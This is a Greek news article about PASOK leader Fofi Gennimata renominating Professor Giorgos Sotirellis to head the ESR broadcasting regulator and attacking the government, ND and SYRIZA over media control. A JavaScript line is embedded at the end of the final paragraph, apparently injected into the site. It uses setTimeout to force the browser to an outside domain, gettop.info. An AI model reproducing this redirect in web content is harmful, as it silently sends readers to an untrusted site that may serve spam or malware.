Γεννηματά για ΕΣΡ: Ακυρώσαμε τα κυβερνητικά σχέδια για μαύρο στην ενημέρωση

0
4

 

Kαταθέτοντας ακόμη μια φορά την πρόταση για τον καθηγητή Γιώργο Σωτηρέλλη για τη θέση του προέδρου του ΕΣΡ η κυρία Φώφη Γεννηματά σημείωσε πως πετύχαμε με τις προσπάθειές μας να ακυρώσουμε τα Κυβερνητικά σχέδια για το μαύρο στα κανάλια και για τον έλεγχο της ενημέρωσης.

Η κυρία Γεννηματά πρόσθεσε πως «το ΠΑΣΟΚ θα καταβάλλει κάθε δυνατή προσπάθεια για να συγκροτηθεί η ανεξάρτητη αρχή και να προχωρήσει ο διαγωνισμός χωρίς τις καθεστωτικές παρεμβάσεις Παππά και τους περιορισμούς στον αριθμό των καναλιών».

«Υποχρεώσαμε τον κ. Παππά να καταργήσει τις αντισυνταγματικές διατάξεις του νόμου του και να αποδώσει τις πλήρεις αρμοδιότητες στο ΕΣΡ, κατοχυρώνοντας και τη «σύμφωνη γνώμη» του σε όλα τα βήματα της διαδικασίας» είπε η πρόεδρος του ΠΑΣΟΚ.

«Η εξέλιξη αυτή πρέπει να οδηγήσει στην συγκρότηση του ΕΣΡ, με πρόσωπα υψηλού κύρους και συναινετική λογική σύμφωνα με τις επιταγές του Συντάγματος» τόνισε και κάλεσε τη ΝΔ να εγκαταλείψει την άγονη στάση της που ουσιαστικά οδηγεί συνειδητά στο να αναπαραχθεί η ασυδοσία στο ραδιοτηλεοπτικό τοπίο και τον ΣΥΡΙΖΑ να εγκαταλείψει κάθε σκέψη, για έλεγχο του ΕΣΡ και νέες μεθοδεύσεις που θα έχουν ως στόχο την επιβολή ελεγχόμενης ενημέρωσης, κάτι που θα αποτελεί πλήγμα για την Δημοκρατία. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here